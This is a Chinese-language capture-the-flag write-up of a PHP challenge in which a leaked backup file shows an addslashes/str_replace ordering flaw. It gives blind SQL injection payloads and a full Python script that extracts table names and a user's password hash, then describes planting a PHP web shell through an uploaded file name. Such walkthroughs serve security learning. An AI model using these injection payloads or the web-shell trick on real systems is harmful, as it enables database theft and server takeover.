题记

  1. 可以说是一个很有意思的题目了,哈哈哈,替换的顺序居然是个考点!

解题

文件泄露

访问robots.txt,可以发现有备份文件
看网页源码会发现有一个image.php 访问image.php.bak可以发现题目考点的源码

  1. <?php
  2. include "config.php";
  4. $id=isset($_GET["id"])?$_GET["id"]:"1";
  5. $path=isset($_GET["path"])?$_GET["path"]:"";
  7. $id=addslashes($id);
  8. $path=addslashes($path);
  10. $id=str_replace(array("\\0","%00","\\'","'"),"",$id);
  11. $path=str_replace(array("\\0","%00","\\'","'"),"",$path);
  13. $result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
  14. $row=mysqli_fetch_array($result,MYSQLI_ASSOC);
  16. $path="./" . $row["path"];
  17. header("Content-Type: image/jpeg");
  18. readfile($path);
  19. ?>

sql注入 addhashes转义

看见addhashes转义首先想到的就是\转义’造成注入漏洞,而且下面还有一个str_replace
这里看一有趣的现象

  1. <?php
  2. $path="\\0";
  3. $path=addslashes($path);
  4. echo($path);
  5. echo("\r\n");
  6. $path=str_replace(array("\\0","%00","\\'","'"),"",$path);
  7. echo $path;
  8. ?>
  9. 输出的结果是
  10. \\0
  11. \

再看这个

  1. <?php
  2. $path="\\0";
  3. $path=addslashes($path);
  4. echo($path);
  5. echo("\r\n");
  6. $path=str_replace(array("\\","%00","\\0'","'"),"",$path);
  7. echo $path;
  8. ?>
  9. 输出的结果是
  10. \\0
  11. 0

题目中用的是第一个的代码
大致的是这样的首先传入一个\0经过addslashes转义为\0
之后再到str_replace()的时候首先匹配的是\0就成了一个\
所以这里我们可以构造一个一个闭合
select * from images where id='\' or path='{$path}'
注意这里id=’\’ or path=’ 就程了一个整体
select * from images where id='\' or path=' or ascii((substr(select table_name from information_schema.tables where table_schema=database()),1,1))>1#
exp:

  1. import requests
  3. url = 'http://d14d709d-349e-42e5-a612-c24db0861f0d.node4.buuoj.cn:81/image.php?id=\\0&path='
  4. flag = ""
  5. for i in range(1,100):
  6.     head = 32
  7.     tail = 130
  8.     while not (abs(tail - head)==1 or tail == head):
  9.         mid = (head + tail) >> 1
  10.         #payload = 'or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{}%23'.format(i,mid)
  11.         #images,users!!!
  12.         #payload = 'or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),{},1))>{}%23'.format(i,mid)
  13.         #id,path,username,password
  14.         #爆密码 ceac970b08a685ae59e8
  15.         payload = 'or ascii(substr((select group_concat(password) from users),{},1))>{}%23'.format(i,mid)
  16.         r = requests.get(url+payload)
  17.         if not r.headers.get("Content-Length"):
  18.             head = mid
  19.         else:
  20.             tail = mid
  21.     if (tail < head):
  22.         tail = head
  23.     flag = flag + chr(tail)
  24.     print("[*]:",flag)

文件上传

随便上传一个jpg文件返回
I logged the file name you uploaded to logs/upload.0c29d8715e3860d129daa2512c2fb4c5.log.php
就是将文件名保存到logs/upload.0c29d8715e3860d129daa2512c2fb4c5.log.php 这个文件里图片.png我们可以在这里写一句话木马 不过 我们前面传的时候已经知道文件不能带有php
所以用短标签绕过![OX97Z%8`[5(1}YONFOF~OY.png蚁剑连接